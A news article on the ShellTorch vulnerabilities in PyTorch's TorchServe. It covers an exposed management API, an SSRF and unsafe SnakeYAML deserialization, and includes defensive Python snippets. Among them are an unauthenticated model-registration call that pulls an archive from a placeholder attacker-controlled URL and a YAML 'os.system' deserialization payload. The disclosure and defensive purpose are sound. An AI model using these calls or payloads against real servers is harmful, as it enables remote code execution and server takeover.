Warning: PyTorch Models Vulnerable to Remote Code Execution via ShellTorch

Oct 03, 2023 | THN | Artificial Intelligence / Cyber Threat

Cybersecurity researchers have disclosed multiple critical security flaws in the TorchServe tool for serving and scaling PyTorch models that could be chained to achieve remote code execution on affected systems.

Israel-based runtime application security company Oligo, which made the discovery, has coined the vulnerabilities ShellTorch.

“These vulnerabilities […] can lead to a full chain Remote Code Execution (RCE), leaving countless thousands of services and end-users — including some of the world’s largest companies — open to unauthorized access and insertion of malicious AI models, and potentially a full server takeover,” security researchers Idan Levcovich, Guy Kaplan, and Gal Elbaz said.

The list of flaws, which have been addressed in version 0.8.2, is as follows –

  • No CVE – Unauthenticated Management Interface API Misconfiguration (management API bound to 0.0.0.0 by default; see the probe sketch after this list)
  • CVE-2023-43654 (CVSS score: 7.2) – A remote server-side request forgery (SSRF) that leads to remote code execution.
  • CVE-2022-1471 (CVSS score: 9.9) – Use of an insecure version of the SnakeYAML open-source library that allows for unsafe deserialization of Java objects
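
By way of illustration, here is a minimal sketch of how a defender might check whether a TorchServe management interface is reachable without credentials. It assumes the documented default management port 8081 and a hypothetical hostname; GET /models is the standard Management API call for listing registered models.

```python
import requests

# Hypothetical host for illustration; point this at an instance you operate.
HOST = "torchserve.example.internal"
MANAGEMENT_PORT = 8081  # TorchServe's default management port

try:
    # GET /models is the documented Management API call for listing registered
    # models. If it answers from a non-local machine without credentials, the
    # interface is exposed in the default configuration described above.
    resp = requests.get(f"http://{HOST}:{MANAGEMENT_PORT}/models", timeout=5)
    print(resp.status_code, resp.text)
except requests.RequestException as exc:
    print(f"Management API not reachable: {exc}")
```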

Successful exploitation of the aforementioned flaws could allow an attacker to send a request to upload a malicious model from an actor-controlled address, leading to arbitrary code execution.

In other words, an attacker who can remotely reach the management server can upload a malicious model, enabling code execution without any authentication on any default TorchServe server.
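
To make that mechanism concrete, the following is a hedged sketch of the kind of unauthenticated Management API call involved: TorchServe's documented model-registration endpoint accepts a remote URL and fetches the archive itself. The hostname, port, and model URL below are placeholders, not values from the research.

```python
import requests

# Placeholder values, not details from the research.
MANAGEMENT_URL = "http://torchserve.example.internal:8081"
MODEL_ARCHIVE_URL = "https://models.example.com/some-model.mar"  # attacker-controlled in the ShellTorch scenario

# POST /models with a `url` parameter asks TorchServe to fetch and register the
# archive itself. On a default deployment this call requires no credentials,
# which is what lets an attacker plant a model of their choosing.
resp = requests.post(
    f"{MANAGEMENT_URL}/models",
    params={"url": MODEL_ARCHIVE_URL, "initial_workers": 1},
    timeout=30,
)
print(resp.status_code, resp.text)
```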

More troubling still, the first two issues can be chained with CVE-2022-1471 to pave the way for code execution and a full takeover of exposed instances.

“AI models can include a YAML file to declare their desired configuration, so by uploading a model with a maliciously crafted YAML file, we were able to trigger an unsafe deserialization attack that resulted in code execution on the machine,” the researchers said.
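
The vulnerable component here is Java's SnakeYAML, but the underlying pitfall is generic: parsing untrusted YAML with a loader that can construct arbitrary objects. The Python/PyYAML snippet below is only an analogy to illustrate that pitfall, not the actual TorchServe code path.

```python
import yaml  # PyYAML

# A tag that instructs a permissive loader to build an arbitrary object.
untrusted = "!!python/object/apply:os.system ['echo code execution']"

# Unsafe: full object construction, roughly analogous to SnakeYAML's default
# Constructor. Left commented out because it would execute the embedded command.
# yaml.unsafe_load(untrusted)

# Safe: restricts documents to plain data types and rejects the malicious tag.
try:
    yaml.safe_load(untrusted)
except yaml.YAMLError as exc:
    print(f"Rejected by safe_load: {exc}")
```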

The severity of the issues has prompted Amazon Web Services (AWS) to issue an advisory urging customers using PyTorch inference Deep Learning Containers (DLC) 1.13.1, 2.0.0, or 2.0.1 in EC2, EKS, or ECS released prior to September 11, 2023, to update to TorchServe version 0.8.2.
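
For operators who installed TorchServe from PyPI rather than through the AWS containers, a quick local check along these lines (assuming the standard `torchserve` package name and the third-party `packaging` library) can confirm the running version is at or above the fixed release.

```python
from importlib.metadata import PackageNotFoundError, version
from packaging.version import Version

FIXED = Version("0.8.2")  # first release containing the ShellTorch fixes

try:
    installed = Version(version("torchserve"))
    if installed < FIXED:
        print(f"torchserve {installed} predates {FIXED}; upgrade recommended")
    else:
        print(f"torchserve {installed} is at or above the fixed release")
except PackageNotFoundError:
    print("torchserve is not installed in this environment")
```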

“Using the privileges granted by these vulnerabilities, it is possible to view, modify, steal, and delete AI models and sensitive data flowing into and from the target TorchServe server,” the researchers said.

“Making these vulnerabilities even more dangerous: when an attacker exploits the model serving server, they can access and alter sensitive data flowing in and out from the target TorchServe server, harming the trust and credibility of the application.”
